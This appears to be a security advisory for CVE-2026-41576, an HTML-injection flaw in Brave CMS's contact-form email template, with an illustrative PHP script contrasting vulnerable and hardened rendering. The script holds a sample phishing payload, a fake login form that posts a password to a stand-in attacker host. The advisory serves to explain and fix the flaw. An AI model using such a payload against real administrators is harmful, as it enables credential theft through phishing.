PT-2026-39140 · Brave Cms · Brave Cms

Smitocaru · Published 2026-05-08 · Updated 2026-05-26 · CVE-2026-41576

CVSS v3.1: 7.1 (High)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
Name of the Vulnerable Software and Affected Versions
Brave CMS, versions prior to commit 6c56603

Description
The contact form is publicly accessible without authentication. The user-supplied message text is passed through PHP's nl2br() function, which converts newlines to <br> tags but does not escape HTML, and the result is then rendered in a Blade email template with the unescaped {!! $msg !!} directive instead of the escaping {{ }} form. Consequently, any markup a visitor types into the contact form is injected verbatim into the email sent to administrators. Although modern email clients generally block JavaScript, they still render HTML, so an attacker can build a phishing interface (for example a fake login form or a misleading link) inside the email that administrators receive. This matches the CVSS vector: no privileges are needed to submit the form (PR:N), while exploitation requires an administrator to open and act on the message (UI:R).

Recommendations
Update to the version containing commit 6c56603, which escapes the message text before it is rendered.
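As an added example (not code from Brave CMS or from this advisory), the standalone PHP script below contrasts the pattern the description identifies, nl2br() output emitted through {!! !!}, with the escape-then-nl2br ordering that fixes it. The escapeHtml() helper stands in for Laravel's e() helper (which wraps htmlspecialchars() with ENT_QUOTES | ENT_SUBSTITUTE and UTF-8); the function names and the attacker payload are constructed for this illustration.

```php
<?php
// Added example (not Brave CMS code): why nl2br() before escaping is unsafe
// in a Blade email template, and the ordering that fixes it.
// Run with: php example.php

// Stand-in for Laravel's e() helper. Blade's {{ $x }} calls e($x); {!! $x !!}
// skips escaping entirely.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern: newlines become <br>, but <, >, quotes and & typed by
// the visitor pass through untouched. Equivalent to a template doing
//   {!! nl2br($msg) !!}
function renderVulnerable(string $msg): string
{
    return nl2br($msg, false);
}

// Hardened pattern: escape the user text first, then insert <br>. The only
// markup left in the output is what nl2br() itself added. Equivalent to
//   {!! nl2br(e($msg)) !!}
function renderHardened(string $msg): string
{
    return nl2br(escapeHtml($msg), false);
}

// Constructed attacker input: a fake "session expired" notice with a form,
// submitted through the public contact form's message field.
$payload = "Hello,\n"
         . "<h2>Your admin session has expired</h2>\n"
         . "<form action=\"https://attacker.invalid/login\" method=\"post\">"
         . "<input name=\"password\" type=\"password\">"
         . "<input type=\"submit\" value=\"Sign in again\"></form>";

echo "--- vulnerable (markup is live in the email body) ---\n";
echo renderVulnerable($payload), "\n\n";

echo "--- hardened (markup is shown as text, newlines still become <br>) ---\n";
echo renderHardened($payload), "\n";
```

Note that simply switching the template to {{ nl2br($msg) }} is not the fix: Blade would then escape the <br> tags nl2br() inserted, so the recipient sees a literal "&lt;br&gt;" and line breaks are lost, which is exactly why templates end up using {!! !!}. The correct pattern keeps {!! !!} but escapes the user-controlled text before nl2br() runs. A quick check when reviewing a Laravel code base for the same class of bug is to search the mail views (typically under resources/views) for {!! and confirm that every value printed that way is either trusted or was escaped before the HTML-producing helper was applied.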

Fix

XSS


Weakness Enumeration

Related Identifiers

CVE-2026-41576

Affected Products

Brave Cms